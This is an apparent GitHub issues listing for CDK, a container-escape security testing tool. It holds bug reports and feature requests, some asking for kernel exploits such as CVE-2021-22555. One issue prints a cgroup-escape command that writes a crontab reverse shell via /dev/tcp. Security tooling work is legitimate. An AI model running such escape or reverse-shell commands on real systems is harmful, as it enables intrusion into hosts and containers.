CDK icon indicating copy to clipboard operation
CDK copied to clipboard

📦 Make security testing of K8s, Docker, and Containerd easier.

Results 23 CDK issues
Sort by recently updated
recently updated
newest added

ref. - https://mp.weixin.qq.com/s/yfBgIr393WzcyKDCz-74WA

feature request

Requirement: * colorful * uniform interface * do not specify \t \n repeatedly in code * especially, in Evaluate module

perf

* Support Self Update * Maybe we can use https://github.com/rhysd/go-github-selfupdate

![image](https://user-images.githubusercontent.com/92633410/155498409-c8e97859-af27-4b11-aacf-10d91263fe30.png) 判断拉取失败,但是打印出的返回包中实际上已获取到信息,应该判定成功并输出到文件中。 secret、psp、configmap这三个都是这样。 ![image](https://user-images.githubusercontent.com/92633410/155498753-451b75f7-2cf9-4562-a055-27e1b6e9b303.png) 可能需要修改这部分代码

bug

From: @nikitastupin in #20 The reason why I didn't implement actual `CAP_SYS_MODULE` escape in CDK is because each kernel version and architecture combination requires kernel module built specifically for it....

enhancement

可以更新CVE-2021-22555到CDK中吗?让支持centos内核版本,列如:Linux 3.10.0-1160.25.1.el7.x86_64 #1 SMP Wed Apr 28 21:49:45 UTC 2021 x86_64 GNU/Linux [cve-2021-22555/exploit.c](https://github.com/google/security-research/blob/master/pocs/linux/cve-2021-22555/exploit.c) [一个内核网络漏洞详解|容器逃逸](https://mp.weixin.qq.com/s/zFDNafu6ArKKwmlkwf-A6w) [CVE-2021-22555](https://github.com/duowen1/Container-escape-exps/blob/main/CVE-2021-22555/readme.md) [CVE-2021-22555 2字节堆溢出写0漏洞提权分析](https://www.anquanke.com/post/id/254027)

这个方法可行吗?根据debugfs里stat读取文件信息,根据这个回显里的信息,将payload写入一些文件当中。 还有很多利用方式,来使内核调用这种替换的文件,比如说利用内核转储之类的 我只是个菜鸡,想到这个地方,麻烦大佬们指正

需要一个解释说明各 release binary 区别的文档(备忘,近期编写)。 > In the current major release we added a lightweight version, it’s prepared for short-life container shells such as Serverless functions. We add build tags in...

documentation

## 问题描述 执行runc-pwn模块,报出`cannot find RunC process inside container, exit.`之后,直接退出,没发生任何事就Finished。 在87行的if判断中直接return退出了函数,导致宿主机还没来得及执行exec命令,目标容器就已经退出了pid的监听。一开始宿主机创建容器时runc执行完就退出了,无法获取runc的pid。 > https://github.com/cdk-team/CDK/blob/b0ca845156bd9ef8c2d2ce13ab33699f04b9047d/pkg/exploit/docker_runc.go#L87-L90 ## 附加信息(Additional Information) 1、执行 `cdk evaluate --full` 的返回结果 ``` $ ./cdk evaluate --full CDK (Container DucK) CDK Version(GitCommit):...

bug

```bash root@79a270635491:/# ./cdk run mount-cgroup "echo \"* * * * * root /bin/bash -c '/bin/bash -i >& /dev/tcp/127.0.0.1/22334 0>&1'\" >> /etc/crontab" 2023/10/17 04:25:59 current cgroup for exploit: memory 2023/10/17 04:25:59...